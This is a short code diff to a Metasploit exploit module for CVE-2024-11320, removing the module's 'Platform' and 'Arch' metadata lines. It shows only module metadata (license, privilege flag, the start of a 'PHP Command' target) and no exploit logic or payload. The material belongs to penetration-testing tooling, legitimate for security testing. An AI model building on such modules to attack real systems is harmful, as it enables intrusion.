@@ -43,9 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://attackerkb.com/topics/CsDUaLijbT/cve-2024-11320']
         ],
         'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'linux', 'php'],
         'Privileged' => false,
-        'Arch' => [ARCH_CMD, ARCH_PHP],
         'Targets' => [
           [
             'PHP Command',
